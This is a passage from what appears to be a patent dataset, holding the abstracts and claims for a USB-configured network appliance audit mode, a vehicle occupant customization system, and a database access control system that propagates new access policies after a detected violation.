restoring the network appliance to the original operating state; and erasing from a memory of the network appliance data collected during the predetermined auditing function. 10. The method of claim 8, wherein the internal configuration settings comprise parameters configured to facilitate operation of the network appliance within an environment in which the network appliance is installed. 11. The method of claim 8, wherein the customized configuration settings comprise parameters configured to facilitate auditing of one or more of security, reliability, loopholes, quality of data, quality of service, and quality of transmission of the network appliance. 12. The method of claim 11, wherein the parameters comprise one or more valid traffic classes, a normal burst size, Weighted Fair Queuing (WFQ) bandwidth usage, a standby routing protocol, a router ID for Open Shortest Path First (OSPF) routing protocol, route reflector setup settings, Border Gateway Protocol (BGP) neighbor reachability information, a BGP synchronization setting, one or more multiprotocol label switching (MPLS) parameters, a log level, a community-string and an object qualifier. 13. The method of claim 8, wherein the network appliance comprises a network security system. 14. The method of claim 13, wherein the network appliance comprises a firewall or a unified threat management system. 15. The method of claim 8, further comprising, prior to configuring the network appliance in accordance with the customized configuration settings, decrypting the customized configuration settings. 16. A network appliance system comprising:
one or more processors; a communication interface device; one or more internal data storage devices operatively coupled to the one or more processors and storing:
internal configuration settings;
an external storage device detection module that, when executed by the one or more processors, indicates whether an external storage device is coupled to the communication interface device, wherein the external storage device stores customized configuration settings;
a load customized configuration settings module that, when executed by the one or more processors responsive to detecting the external storage device, loads system configuration settings from the customized configuration settings;
a load internal configuration settings module that, when executed by the one or more processors responsive to detecting an absence of the external storage device, loads system configuration settings from the internal configuration settings;
a run configuration settings module that, when executed by the one or more processors, configures the network appliance system in accordance with the loaded system configuration settings. 17. The system of claim 16, wherein the customized configuration settings comprise parameters configured to audit one or more of security, reliability, loopholes, quality of data, quality of service, and quality of transmission of the network appliance system. 18. The system of claim 16, wherein the customized configuration settings are encrypted. 19. The system of claim 16, wherein one or more of the internal configuration settings are used after the customized configuration settings are loaded. 20. The system of claim 16, wherein the external storage device comprises one of a Universal Serial Bus (USB) flash drive, a flash card, a Secure Digital (SD) card, and an external hard drive. 21. The system of claim 16, wherein the customized configuration settings or content related thereto are deleted from the network appliance system responsive to the external storage device being removed. 22. The system of claim 16, wherein the network appliance system comprises a firewall. 23. The system of claim 16, wherein the network appliance system comprises a unified threat management system. | Methods and systems for temporarily configuring a network appliance in accordance with externally provided customized configuration settings are provided. According to one embodiment, a network appliance may operate in one of multiple configuration modes, including an internal configuration mode and an external configuration mode. When operating in the internal configuration mode, the network appliance loads and runs configuration settings from a memory internal to the network appliance. When operating in the external configuration mode, the network appliance loads and runs configuration settings from an external storage device coupled to an interface of the network appliance.1. A method comprising:
providing a network appliance with a plurality of configuration modes, including an internal configuration mode and an external configuration mode; when operating in the internal configuration mode, configuring the network appliance by loading and running configuration settings from a memory internal to the network appliance; and when operating in the external configuration mode, configuring the network appliance by loading and running configuration settings from an external storage device coupled to an interface of the network appliance. 2. The method of claim 1, further comprising responsive to detecting the external storage device has been coupled to the interface, causing the network appliance to enter into the external configuration mode. 3. The method of claim 1, further comprising while in the external configuration mode performing audit processing including logging information relating to one or more of security, reliability, loopholes, quality of data, quality of service, and quality of transmission of the network appliance. 4. The method of claim 3, further comprising responsive to detecting the external storage device has been decoupled from the interface:
erasing from a memory of the network appliance data collected during the audit processing; and causing the network appliance to enter into the internal configuration mode. 5. The method of claim 1, further comprising responsive to detecting the external storage device is not coupled to the interface, causing the network appliance to enter into the internal configuration mode. 6. The method of claim 3, wherein the configuration settings loaded from the external storage device are configured to facilitate auditing of one or more of security, reliability, loopholes, quality of data, quality of service, and quality of transmission of the network appliance. 7. The method of claim 6, wherein the configuration settings comprise one or more valid traffic classes, a normal burst size, Weighted Fair Queuing (WFQ) bandwidth usage, a standby routing protocol, a router ID for Open Shortest Path First (OSPF) routing protocol, route reflector setup settings, Border Gateway Protocol (BGP) neighbor reachability information, a BGP synchronization setting, one or more multiprotocol label switching (MPLS) parameters, a log level, a community-string and an object qualifier. 8. A method comprising:
detecting an external storage device coupled to an interface of a network appliance, wherein the network appliance is running in accordance with an original operating state as dictated by internal configuration settings stored in an internal memory of the network appliance; responsive to the detecting:
loading customized configuration settings stored in the external storage device;
configuring the network appliance in accordance with the customized configuration settings; and
performing a predetermined function based on the customized configuration settings. 9. The method of claim 8, further comprising responsive to detecting decoupling of the external storage device from the interface:
restoring the network appliance to the original operating state; and erasing from a memory of the network appliance data collected during the predetermined auditing function. 10. The method of claim 8, wherein the internal configuration settings comprise parameters configured to facilitate operation of the network appliance within an environment in which the network appliance is installed. 11. The method of claim 8, wherein the customized configuration settings comprise parameters configured to facilitate auditing of one or more of security, reliability, loopholes, quality of data, quality of service, and quality of transmission of the network appliance. 12. The method of claim 11, wherein the parameters comprise one or more valid traffic classes, a normal burst size, Weighted Fair Queuing (WFQ) bandwidth usage, a standby routing protocol, a router ID for Open Shortest Path First (OSPF) routing protocol, route reflector setup settings, Border Gateway Protocol (BGP) neighbor reachability information, a BGP synchronization setting, one or more multiprotocol label switching (MPLS) parameters, a log level, a community-string and an object qualifier. 13. The method of claim 8, wherein the network appliance comprises a network security system. 14. The method of claim 13, wherein the network appliance comprises a firewall or a unified threat management system. 15. The method of claim 8, further comprising, prior to configuring the network appliance in accordance with the customized configuration settings, decrypting the customized configuration settings. 16. A network appliance system comprising:
one or more processors; a communication interface device; one or more internal data storage devices operatively coupled to the one or more processors and storing:
internal configuration settings;
an external storage device detection module that, when executed by the one or more processors, indicates whether an external storage device is coupled to the communication interface device, wherein the external storage device stores customized configuration settings;
a load customized configuration settings module that, when executed by the one or more processors responsive to detecting the external storage device, loads system configuration settings from the customized configuration settings;
a load internal configuration settings module that, when executed by the one or more processors responsive to detecting an absence of the external storage device, loads system configuration settings from the internal configuration settings;
a run configuration settings module that, when executed by the one or more processors, configures the network appliance system in accordance with the loaded system configuration settings. 17. The system of claim 16, wherein the customized configuration settings comprise parameters configured to audit one or more of security, reliability, loopholes, quality of data, quality of service, and quality of transmission of the network appliance system. 18. The system of claim 16, wherein the customized configuration settings are encrypted. 19. The system of claim 16, wherein one or more of the internal configuration settings are used after the customized configuration settings are loaded. 20. The system of claim 16, wherein the external storage device comprises one of a Universal Serial Bus (USB) flash drive, a flash card, a Secure Digital (SD) card, and an external hard drive. 21. The system of claim 16, wherein the customized configuration settings or content related thereto are deleted from the network appliance system responsive to the external storage device being removed. 22. The system of claim 16, wherein the network appliance system comprises a firewall. 23. The system of claim 16, wherein the network appliance system comprises a unified threat management system. | 2,400 |
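The internal/external configuration-mode switching recited in claims 1-5 of the record above can be sketched as a minimal Python model. This is a hedged illustration only: every name here (NetworkAppliance, on_device_event, the settings dicts) is an assumption made for exposition, not the patent's implementation.

```python
# Hypothetical model of claims 1-5: switch to externally supplied settings
# when a storage device is coupled, and erase audit data and restore the
# internal settings when it is decoupled. All names are illustrative.
class NetworkAppliance:
    def __init__(self, internal_settings):
        self.internal_settings = internal_settings   # claim 1: internal memory
        self.active_settings = internal_settings
        self.mode = "internal"
        self.audit_log = []                           # claim 3: audit data

    def on_device_event(self, external_settings):
        """Handle coupling (settings given) or decoupling (None) of a device."""
        if external_settings is not None:
            # Claim 2: device coupled -> enter the external configuration mode.
            self.mode = "external"
            self.active_settings = external_settings
        else:
            # Claim 4: device decoupled -> erase audit data, go internal.
            self.audit_log.clear()
            self.mode = "internal"
            self.active_settings = self.internal_settings

appliance = NetworkAppliance({"log_level": "info"})
appliance.on_device_event({"log_level": "debug"})  # external device coupled
appliance.audit_log.append("qos sample")           # audit processing runs
appliance.on_device_event(None)                    # device decoupled
```

After the decoupling event, the sketch is back in its original operating state with the collected audit data erased, mirroring claims 4 and 9.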
9,119 | 9,119 | 15,341,046 | 2,483 | A customization system for a vehicle includes a control operable to generate an output in a vehicle, with the output being a visual output, an audible output and/or a haptic output. An occupant recognition system is operable to recognize a particular occupant in the vehicle. The control accesses previously input occupant selections that are stored in a memory of the customization system. Responsive to the occupant recognition system recognizing a particular occupant of the vehicle, the control accesses previously input occupant selections associated with that particular occupant and, responsive to an accessed previously input occupant selection corresponding to a current date or vehicle status or location, the control generates a predetermined output for that particular occupant that corresponds to the current date or vehicle status or location. | 1. A customization system for a vehicle, said customization system comprising:
a control operable to generate an output in a vehicle, said output comprising an output selected from the group consisting of a visual output, an audible output and a haptic output; an occupant recognition system operable to recognize a particular occupant in the vehicle; wherein said control accesses previously input occupant selections that are stored in a memory of said customization system; and wherein, responsive to the occupant recognition system recognizing a particular occupant in the vehicle, said control accesses previously input occupant selections associated with that particular occupant and, responsive to an accessed previously input occupant selection corresponding to a current date or vehicle status, said control generates a predetermined output for that particular occupant that corresponds to the current date or vehicle status. 2. The customization system of claim 1, wherein the recognized particular occupant is a driver of the vehicle. 3. The customization system of claim 2, wherein said occupant recognition system comprises at least one camera configured to be disposed in the vehicle so as to have a field of view that encompasses a driver's head region in the vehicle. 4. The customization system of claim 1, wherein the recognized particular occupant is a passenger of the vehicle. 5. The customization system of claim 4, wherein said occupant recognition system comprises at least one camera configured to be disposed in the vehicle so as to have a field of view that encompasses head regions of passengers in the vehicle. 6. The customization system of claim 1, wherein the previously input occupant selections include a birth date of the occupant, and wherein, responsive to the occupant recognition system recognizing the particular occupant in the vehicle and responsive to the accessed previously input birth date corresponding to the current date, said control generates a birthday message for that particular occupant in the vehicle. 7. 
The customization system of claim 6, wherein the birthday message comprises playing an audible song for that particular occupant in the vehicle. 8. The customization system of claim 6, wherein the birthday message comprises playing a video for viewing by that particular occupant in the vehicle. 9. The customization system of claim 6, wherein a camera in the vehicle captures image data of that particular occupant in the vehicle when said control generates the birthday message. 10. The customization system of claim 1, wherein the previously input occupant selections include a geographical location, and wherein, responsive to the occupant recognition system recognizing the particular occupant in the vehicle and responsive to the accessed previously input geographical location corresponding to the current geographical location of the vehicle, said control generates a message for that particular occupant in the vehicle that is associated with the previously input geographical location. 11. The customization system of claim 1, wherein said control generates the output responsive to at least one of (i) the vehicle not moving, (ii) the vehicle moving below a threshold speed and (iii) the vehicle arriving at a destination. 12. The customization system of claim 1, wherein the predetermined output generated by said control comprises an output selected by that particular occupant for the current date or vehicle status. 13. The customization system of claim 1, wherein the occupant recognition system recognizes a particular occupant in the vehicle responsive to an input by that particular occupant. 14. A customization system for a vehicle, said customization system comprising:
a control operable to generate an output in a vehicle, said output comprising a visual output and an audible output; an occupant recognition system operable to recognize a particular occupant in the vehicle; wherein said control accesses previously input occupant selections that are stored in a memory of said customization system; wherein, responsive to the occupant recognition system recognizing a particular occupant in the vehicle, said control accesses previously input occupant selections associated with that particular occupant and, responsive to an accessed previously input occupant selection corresponding to a current date or vehicle location, said control generates a predetermined output for that particular occupant that corresponds to the current date or vehicle location; and wherein the predetermined output generated by said control comprises an output selected by that particular occupant and associated with the previously input occupant selection that corresponds to the current date or vehicle location. 15. The customization system of claim 14, wherein the previously input occupant selections include a date selected by the particular occupant, and wherein, responsive to the occupant recognition system recognizing the particular occupant and responsive to the accessed previously input selected date corresponding to the current date, said control generates a selected message for that particular occupant that is associated with the previously input selected date. 16. The customization system of claim 14, wherein a camera in the vehicle captures image data of the particular occupant in the vehicle when said control generates the predetermined output. 17. 
The customization system of claim 14, wherein the previously input occupant selections include a geographical location selected by the particular occupant, and wherein, responsive to the occupant recognition system recognizing the particular occupant and responsive to the accessed previously input selected geographical location corresponding to the current geographical location of the vehicle, said control generates a selected message for that particular occupant that is associated with the previously input geographical location. 18. A customization system for a vehicle, said customization system comprising:
a control operable to generate an output in a vehicle, said output comprising an output selected from the group consisting of a visual output and an audible output; an occupant recognition system operable to recognize a particular occupant in the vehicle; wherein said control accesses previously input occupant selections that are stored in a memory of said customization system; wherein, responsive to the occupant recognition system recognizing a particular occupant of the vehicle, said control accesses previously input occupant selections associated with that particular occupant; wherein the previously input occupant selections include at least one date selected by the particular occupant, and wherein, responsive to the occupant recognition system recognizing the particular occupant in the vehicle and responsive to an accessed previously input selected date corresponding to the current date, said control generates an output for that particular occupant that is associated with the previously input selected date; and wherein the previously input occupant selections include at least one geographical location selected by the particular occupant, and wherein, responsive to the occupant recognition system recognizing the particular occupant and responsive to an accessed previously input selected geographical location corresponding to the current geographical location of the vehicle, said control generates another output for that particular occupant that is associated with the previously input geographical location. 19. The customization system of claim 18, wherein a camera in the vehicle captures image data of that particular occupant in the vehicle when said control generates the output. 20. The customization system of claim 18, wherein said control generates the output responsive to at least one of (i) the vehicle not moving, (ii) the vehicle moving below a threshold speed and (iii) the vehicle arriving at a destination. 
| A customization system for a vehicle includes a control operable to generate an output in a vehicle, with the output being a visual output, an audible output and/or a haptic output. An occupant recognition system is operable to recognize a particular occupant in the vehicle. The control accesses previously input occupant selections that are stored in a memory of the customization system. Responsive to the occupant recognition system recognizing a particular occupant of the vehicle, the control accesses previously input occupant selections associated with that particular occupant and, responsive to an accessed previously input occupant selection corresponding to a current date or vehicle status or location, the control generates a predetermined output for that particular occupant that corresponds to the current date or vehicle status or location.1. A customization system for a vehicle, said customization system comprising:
a control operable to generate an output in a vehicle, said output comprising an output selected from the group consisting of a visual output, an audible output and a haptic output; an occupant recognition system operable to recognize a particular occupant in the vehicle; wherein said control accesses previously input occupant selections that are stored in a memory of said customization system; and wherein, responsive to the occupant recognition system recognizing a particular occupant in the vehicle, said control accesses previously input occupant selections associated with that particular occupant and, responsive to an accessed previously input occupant selection corresponding to a current date or vehicle status, said control generates a predetermined output for that particular occupant that corresponds to the current date or vehicle status. 2. The customization system of claim 1, wherein the recognized particular occupant is a driver of the vehicle. 3. The customization system of claim 2, wherein said occupant recognition system comprises at least one camera configured to be disposed in the vehicle so as to have a field of view that encompasses a driver's head region in the vehicle. 4. The customization system of claim 1, wherein the recognized particular occupant is a passenger of the vehicle. 5. The customization system of claim 4, wherein said occupant recognition system comprises at least one camera configured to be disposed in the vehicle so as to have a field of view that encompasses head regions of passengers in the vehicle. 6. The customization system of claim 1, wherein the previously input occupant selections include a birth date of the occupant, and wherein, responsive to the occupant recognition system recognizing the particular occupant in the vehicle and responsive to the accessed previously input birth date corresponding to the current date, said control generates a birthday message for that particular occupant in the vehicle. 7. 
The customization system of claim 6, wherein the birthday message comprises playing an audible song for that particular occupant in the vehicle. 8. The customization system of claim 6, wherein the birthday message comprises playing a video for viewing by that particular occupant in the vehicle. 9. The customization system of claim 6, wherein a camera in the vehicle captures image data of that particular occupant in the vehicle when said control generates the birthday message. 10. The customization system of claim 1, wherein the previously input occupant selections include a geographical location, and wherein, responsive to the occupant recognition system recognizing the particular occupant in the vehicle and responsive to the accessed previously input geographical location corresponding to the current geographical location of the vehicle, said control generates a message for that particular occupant in the vehicle that is associated with the previously input geographical location. 11. The customization system of claim 1, wherein said control generates the output responsive to at least one of (i) the vehicle not moving, (ii) the vehicle moving below a threshold speed and (iii) the vehicle arriving at a destination. 12. The customization system of claim 1, wherein the predetermined output generated by said control comprises an output selected by that particular occupant for the current date or vehicle status. 13. The customization system of claim 1, wherein the occupant recognition system recognizes a particular occupant in the vehicle responsive to an input by that particular occupant. 14. A customization system for a vehicle, said customization system comprising:
a control operable to generate an output in a vehicle, said output comprising a visual output and an audible output; an occupant recognition system operable to recognize a particular occupant in the vehicle; wherein said control accesses previously input occupant selections that are stored in a memory of said customization system; wherein, responsive to the occupant recognition system recognizing a particular occupant in the vehicle, said control accesses previously input occupant selections associated with that particular occupant and, responsive to an accessed previously input occupant selection corresponding to a current date or vehicle location, said control generates a predetermined output for that particular occupant that corresponds to the current date or vehicle location; and wherein the predetermined output generated by said control comprises an output selected by that particular occupant and associated with the previously input occupant selection that corresponds to the current date or vehicle location. 15. The customization system of claim 14, wherein the previously input occupant selections include a date selected by the particular occupant, and wherein, responsive to the occupant recognition system recognizing the particular occupant and responsive to the accessed previously input selected date corresponding to the current date, said control generates a selected message for that particular occupant that is associated with the previously input selected date. 16. The customization system of claim 14, wherein a camera in the vehicle captures image data of the particular occupant in the vehicle when said control generates the predetermined output. 17. 
The customization system of claim 14, wherein the previously input occupant selections include a geographical location selected by the particular occupant, and wherein, responsive to the occupant recognition system recognizing the particular occupant and responsive to the accessed previously input selected geographical location corresponding to the current geographical location of the vehicle, said control generates a selected message for that particular occupant that is associated with the previously input geographical location. 18. A customization system for a vehicle, said customization system comprising:
a control operable to generate an output in a vehicle, said output comprising an output selected from the group consisting of a visual output and an audible output; an occupant recognition system operable to recognize a particular occupant in the vehicle; wherein said control accesses previously input occupant selections that are stored in a memory of said customization system; wherein, responsive to the occupant recognition system recognizing a particular occupant of the vehicle, said control accesses previously input occupant selections associated with that particular occupant; wherein the previously input occupant selections include at least one date selected by the particular occupant, and wherein, responsive to the occupant recognition system recognizing the particular occupant in the vehicle and responsive to an accessed previously input selected date corresponding to the current date, said control generates an output for that particular occupant that is associated with the previously input selected date; and wherein the previously input occupant selections include at least one geographical location selected by the particular occupant, and wherein, responsive to the occupant recognition system recognizing the particular occupant and responsive to an accessed previously input selected geographical location corresponding to the current geographical location of the vehicle, said control generates another output for that particular occupant that is associated with the previously input geographical location. 19. The customization system of claim 18, wherein a camera in the vehicle captures image data of that particular occupant in the vehicle when said control generates the output. 20. The customization system of claim 18, wherein said control generates the output responsive to at least one of (i) the vehicle not moving, (ii) the vehicle moving below a threshold speed and (iii) the vehicle arriving at a destination. | 2,400 |
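The date/location matching described in claims 1, 10 and 18 of the record above reduces to a simple lookup over an occupant's stored selections. The sketch below is an illustrative assumption only: the data layout, function name and occupant IDs are invented for exposition and are not the patent's implementation.

```python
import datetime

# Hypothetical selection logic: given a recognized occupant, return every
# previously input output whose stored date matches today or whose stored
# location matches the vehicle's current location (claims 1, 10, 18).
def select_outputs(occupant_id, selections, today, vehicle_location):
    """Return stored outputs whose saved date or location matches now."""
    matched = []
    for sel in selections.get(occupant_id, []):
        if sel.get("date") == today or sel.get("location") == vehicle_location:
            matched.append(sel["output"])
    return matched

selections = {
    "occupant-1": [
        {"date": datetime.date(2024, 3, 1), "output": "play birthday song"},
        {"location": "home", "output": "show arrival message"},
    ]
}
on_birthday = select_outputs("occupant-1", selections,
                             datetime.date(2024, 3, 1), "work")
at_home = select_outputs("occupant-1", selections,
                         datetime.date(2024, 5, 2), "home")
```

In a real system the gating conditions of claims 11 and 20 (vehicle stopped, below a threshold speed, or arrived) would be checked before any matched output is actually rendered.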
9,120 | 9,120 | 16,457,937 | 2,434 | A mechanism that dynamically creates a new access policy for a set of database servers when a policy violation has been identified in a database access response issued by any database in the set. The new access policy is then propagated in real-time and instantiated across the set of database servers so as to inoculate the other database servers and pre-empt any new compromise of information based on the intruder's actions that were found to have produced the policy violation in the first instance. Thus, the approach uses a response policy violation at one database server of a set to trigger generation of a new request access policy that is then instantiated across one or more other database servers. This response policy violation-to-request access policy instantiation occurs in substantially real-time so that the intruder cannot use a prior successful access request to obtain information from other databases using a similar strategy. | 1. A method operative in a database access control system, the database access control system being associated with a set of database servers that share an access policy, comprising:
receiving from a given one of the database servers a copy of a database access request issued by a client, together with a response to that database access request that was served to the client by the given one of the database servers; analyzing the response against the access policy; upon determining that the response includes a violation of the access policy, automatically generating a new access policy; and real-time propagating the new access policy to one or more other database servers in the set for instantiation on the one or more other database servers. 2. The method as described in claim 1 wherein analyzing the response against the access policy executes an extrusion rule. 3. The method as described in claim 2 wherein execution of the extrusion rule compares a payload in the response to a value in the extrusion rule to determine whether the violation of the access policy has occurred. 4. The method as described in claim 1 further including issuing a command to terminate a session initiated by the client to the given one of the database servers and during which the response was generated. 5. The method as described in claim 1 wherein the new access policy includes information that identifies the client to the one or more other database servers. 6. The method as described in claim 1 wherein the copy of the database access request and the response are received from a tap executing at the given one of the database servers, the analyzing occurs at a collector, and the generating and propagating occur at a central manager. 7. The method as described in claim 1 wherein the new access policy immunizes the one or more other database servers in the set against one or more additional database access requests originated by the client. | A mechanism that dynamically creates a new access policy for a set of database servers when a policy violation has been identified in a database access response issued by any database in the set. 
The new access policy is then propagated in real-time and instantiated across the set of database servers so as to inoculate the other database servers and pre-empt any new compromise of information based on the intruder's actions that were found to have produced the policy violation in the first instance. Thus, the approach uses a response policy violation at one database server of a set to trigger generation of a new request access policy that is then instantiated across one or more other database servers. This response policy violation-to-request access policy instantiation occurs in substantially real-time so that the intruder cannot use a prior successful access request to obtain information from other databases using a similar strategy.1. A method operative in a database access control system, the database access control system being associated with a set of database servers that share an access policy, comprising:
receiving from a given one of the database servers a copy of a database access request issued by a client, together with a response to that database access request that was served to the client by the given one of the database servers; analyzing the response against the access policy; upon determining that the response includes a violation of the access policy, automatically generating a new access policy; and real-time propagating the new access policy to one or more other database servers in the set for instantiation on the one or more other database servers. 2. The method as described in claim 1 wherein analyzing the response against the access policy executes an extrusion rule. 3. The method as described in claim 2 wherein execution of the extrusion rule compares a payload in the response to a value in the extrusion rule to determine whether the violation of the access policy has occurred. 4. The method as described in claim 1 further including issuing a command to terminate a session initiated by the client to the given one of the database servers and during which the response was generated. 5. The method as described in claim 1 wherein the new access policy includes information that identifies the client to the one or more other database servers. 6. The method as described in claim 1 wherein the copy of the database access requests and the response are received from a tap executing at the given one of the database servers, the analyzing occurs at a collector, and the generating and propagating occurs at a central manager. 7. The method as described in claim 1 wherein the new access policy immunizes the one or more other database servers in the set against one or more additional database access requests originated by the client. | 2,400 |
9,121 | 9,121 | 15,872,116 | 2,434 | A mechanism that dynamically creates a new access policy for a set of database servers when a policy violation has been identified in a database access response issued by any database in the set. The new access policy is then propagated in real-time and instantiated across the set of database servers so as to inoculate the other database servers and pre-empt any new compromise of information based on the intruder's actions that were found to have produced the policy violation in the first instance. Thus, the approach uses a response policy violation at one database server of a set to trigger generation of a new request access policy that is then instantiated across one or more other database servers. This response policy violation-to-request access policy instantiation occurs in substantially real-time so that the intruder cannot use a prior successful access request to obtain information from other databases using a similar strategy. | 1. A method operative in a database access control system, the database access control system being associated with a set of database servers that share an access policy, comprising:
receiving from a given one of the database servers a copy of a database access request issued by a client, together with a response to that database access request that was served to the client by the given one of the database servers; analyzing the response against the access policy; upon determining that the response includes a violation of the access policy, automatically generating a new access policy; and real-time propagating the new access policy to one or more other database servers in the set for instantiation on the one or more other database servers. 2. The method as described in claim 1 wherein analyzing the response against the access policy executes an extrusion rule. 3. The method as described in claim 2 wherein execution of the extrusion rule compares a payload in the response to a value in the extrusion rule to determine whether the violation of the access policy has occurred. 4. The method as described in claim 1 further including issuing a command to terminate a session initiated by the client to the given one of the database servers and during which the response was generated. 5. The method as described in claim 1 wherein the new access policy includes information that identifies the client to the one or more other database servers. 6. The method as described in claim 1 wherein the copy of the database access requests and the response are received from a tap executing at the given one of the database servers, the analyzing occurs at a collector, and the generating and propagating occurs at a central manager. 7. The method as described in claim 1 wherein the new access policy immunizes the one or more other database servers in the set against one or more additional database access requests originated by the client. 8. An apparatus, comprising:
a processor; computer memory holding computer program instructions operative in association with a database access control system, the database access control system being associated with a set of database servers that share an access policy, the computer program instructions comprising:
program code configured to receive from a given one of the database servers a copy of a database access request issued by a client, together with a response to that database access request that was served to the client by the given one of the database servers;
program code configured to analyze the response against the access policy;
program code configured to automatically generate a new access policy upon a determination that the response includes a violation of the access policy; and
program code configured to propagate the new access policy, in real-time, to one or more other database servers in the set for instantiation on the one or more other database servers. 9. The apparatus as described in claim 8 wherein the program code configured to analyze the response against the access policy executes an extrusion rule. 10. The apparatus as described in claim 9 wherein execution of the extrusion rule compares a payload in the response to a value in the extrusion rule to determine whether the violation of the access policy has occurred. 11. The apparatus as described in claim 8 wherein the computer program instructions further include program code to issue a command to terminate a session initiated by the client to the given one of the database servers and during which the response was generated. 12. The apparatus as described in claim 8 wherein the new access policy includes information that identifies the client to the one or more other database servers. 13. The apparatus as described in claim 8 wherein the copy of the database access requests and the response are received from a tap executing at the given one of the database servers, the program code to analyze is executed at a collector, and the program code to generate and propagate the new access policy is executed at a central manager. 14. The apparatus as described in claim 8 wherein the new access policy immunizes the one or more other database servers in the set against one or more additional database access requests originated by the client. 15. A computer program product comprising computer program instructions on non-transitory computer-readable media, the computer program instructions executed by a processor in association with a database access control system, the database access control system being associated with a set of database servers that share an access policy, the computer program instructions comprising:
program code configured to receive from a given one of the database servers a copy of a database access request issued by a client, together with a response to that database access request that was served to the client by the given one of the database servers; program code configured to analyze the response against the access policy; program code configured to automatically generate a new access policy upon a determination that the response includes a violation of the access policy; and program code configured to propagate the new access policy, in real-time, to one or more other database servers in the set for instantiation on the one or more other database servers. 16. The computer program product as described in claim 15 wherein the program code configured to analyze the response against the access policy executes an extrusion rule. 17. The computer program product as described in claim 16 wherein execution of the extrusion rule compares a payload in the response to a value in the extrusion rule to determine whether the violation of the access policy has occurred. 18. The computer program product as described in claim 15 wherein the computer program instructions further include program code to issue a command to terminate a session initiated by the client to the given one of the database servers and during which the response was generated. 19. The computer program product as described in claim 15 wherein the new access policy includes information that identifies the client to the one or more other database servers. 20. The computer program product as described in claim 15 wherein the copy of the database access requests and the response are received from a tap executing at the given one of the database servers, the program code to analyze is executed at a collector, and the program code to generate and propagate the new access policy is executed at a central manager. 21. 
The computer program product as described in claim 15 wherein the new access policy immunizes the one or more other database servers in the set against one or more additional database access requests originated by the client. 22. A database access control system, comprising:
a tap that executes in hardware in association with a database server, the database server being one of a set of database servers that share an access policy; a collector that executes in hardware in association with one or more taps, the collector being configured to receive from a tap at a given one of the database servers a copy of a database access request issued by a client, together with a response to that database access request that was served to the client by the given one of the database servers, and to analyze the response against the access policy; and a manager that executes in hardware in association with one or more collectors, the manager being configured to automatically generate a new access policy upon a determination that the response includes a violation of the access policy, and to propagate the new access policy to one or more other database servers in the set for instantiation on the one or more other database servers; wherein the access policy violation-to-new access policy generation and propagation occurs in real-time to immunize the one or more other database servers in the set against one or more additional database access requests originated by the client. | A mechanism that dynamically creates a new access policy for a set of database servers when a policy violation has been identified in a database access response issued by any database in the set. The new access policy is then propagated in real-time and instantiated across the set of database servers so as to inoculate the other database servers and pre-empt any new compromise of information based on the intruder's actions that were found to have produced the policy violation in the first instance. Thus, the approach uses a response policy violation at one database server of a set to trigger generation of a new request access policy that is then instantiated across one or more other database servers.
This response policy violation-to-request access policy instantiation occurs in substantially real-time so that the intruder cannot use a prior successful access request to obtain information from other databases using a similar strategy.1. A method operative in a database access control system, the database access control system being associated with a set of database servers that share an access policy, comprising:
receiving from a given one of the database servers a copy of a database access request issued by a client, together with a response to that database access request that was served to the client by the given one of the database servers; analyzing the response against the access policy; upon determining that the response includes a violation of the access policy, automatically generating a new access policy; and real-time propagating the new access policy to one or more other database servers in the set for instantiation on the one or more other database servers. 2. The method as described in claim 1 wherein analyzing the response against the access policy executes an extrusion rule. 3. The method as described in claim 2 wherein execution of the extrusion rule compares a payload in the response to a value in the extrusion rule to determine whether the violation of the access policy has occurred. 4. The method as described in claim 1 further including issuing a command to terminate a session initiated by the client to the given one of the database servers and during which the response was generated. 5. The method as described in claim 1 wherein the new access policy includes information that identifies the client to the one or more other database servers. 6. The method as described in claim 1 wherein the copy of the database access requests and the response are received from a tap executing at the given one of the database servers, the analyzing occurs at a collector, and the generating and propagating occurs at a central manager. 7. The method as described in claim 1 wherein the new access policy immunizes the one or more other database servers in the set against one or more additional database access requests originated by the client. 8. An apparatus, comprising:
a processor; computer memory holding computer program instructions operative in association with a database access control system, the database access control system being associated with a set of database servers that share an access policy, the computer program instructions comprising:
program code configured to receive from a given one of the database servers a copy of a database access request issued by a client, together with a response to that database access request that was served to the client by the given one of the database servers;
program code configured to analyze the response against the access policy;
program code configured to automatically generate a new access policy upon a determination that the response includes a violation of the access policy; and
program code configured to propagate the new access policy, in real-time, to one or more other database servers in the set for instantiation on the one or more other database servers. 9. The apparatus as described in claim 8 wherein the program code configured to analyze the response against the access policy executes an extrusion rule. 10. The apparatus as described in claim 9 wherein execution of the extrusion rule compares a payload in the response to a value in the extrusion rule to determine whether the violation of the access policy has occurred. 11. The apparatus as described in claim 8 wherein the computer program instructions further include program code to issue a command to terminate a session initiated by the client to the given one of the database servers and during which the response was generated. 12. The apparatus as described in claim 8 wherein the new access policy includes information that identifies the client to the one or more other database servers. 13. The apparatus as described in claim 8 wherein the copy of the database access requests and the response are received from a tap executing at the given one of the database servers, the program code to analyze is executed at a collector, and the program code to generate and propagate the new access policy is executed at a central manager. 14. The apparatus as described in claim 8 wherein the new access policy immunizes the one or more other database servers in the set against one or more additional database access requests originated by the client. 15. A computer program product comprising computer program instructions on non-transitory computer-readable media, the computer program instructions executed by a processor in association with a database access control system, the database access control system being associated with a set of database servers that share an access policy, the computer program instructions comprising:
program code configured to receive from a given one of the database servers a copy of a database access request issued by a client, together with a response to that database access request that was served to the client by the given one of the database servers; program code configured to analyze the response against the access policy; program code configured to automatically generate a new access policy upon a determination that the response includes a violation of the access policy; and program code configured to propagate the new access policy, in real-time, to one or more other database servers in the set for instantiation on the one or more other database servers. 16. The computer program product as described in claim 15 wherein the program code configured to analyze the response against the access policy executes an extrusion rule. 17. The computer program product as described in claim 16 wherein execution of the extrusion rule compares a payload in the response to a value in the extrusion rule to determine whether the violation of the access policy has occurred. 18. The computer program product as described in claim 15 wherein the computer program instructions further include program code to issue a command to terminate a session initiated by the client to the given one of the database servers and during which the response was generated. 19. The computer program product as described in claim 15 wherein the new access policy includes information that identifies the client to the one or more other database servers. 20. The computer program product as described in claim 15 wherein the copy of the database access requests and the response are received from a tap executing at the given one of the database servers, the program code to analyze is executed at a collector, and the program code to generate and propagate the new access policy is executed at a central manager. 21. 
The computer program product as described in claim 15 wherein the new access policy immunizes the one or more other database servers in the set against one or more additional database access requests originated by the client. 22. A database access control system, comprising:
